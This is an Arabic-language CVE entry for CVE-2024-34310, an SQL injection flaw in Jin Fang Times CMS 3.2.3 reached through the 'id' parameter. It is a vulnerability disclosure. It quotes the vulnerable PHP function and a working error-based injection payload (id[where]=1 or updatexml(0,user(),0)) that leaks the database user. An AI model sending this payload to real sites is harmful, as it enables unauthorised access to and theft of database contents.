
CVE-2024-34310
CVE-2024-34310
[الوصف المقترح] تم اكتشاف أن نظام إدارة المحتوى Jin Fang Times الإصدار 3.2.3 يحتوي على ثغرة حقن SQL عبر معامل id.
[نوع الثغرة] حقن SQL
[بائع المنتج] https://www.bjjfsd.com/
[قاعدة كود المنتج المتأثر] نظام إدارة المحتوى Jin Fang times - 3.2.3
[المكون المتأثر] public function data_show($id = 0) {
if (empty($id)) { $this->redirect('index'); }$info = M('News')->find($id);
[نوع الهجوم] عن بُعد
[تأثير تنفيذ الكود] صحيح
[تأثير كشف المعلومات] صحيح
[متجهات الهجوم] m=Wap&c=Index&a=data_show&id[where]=1%20or%20updatexml(0,user(),0)
[المكتشف] yishan
[المرجع] http://jin.com https://www.bjjfsd.com/
استخدم CVE-2024-34310.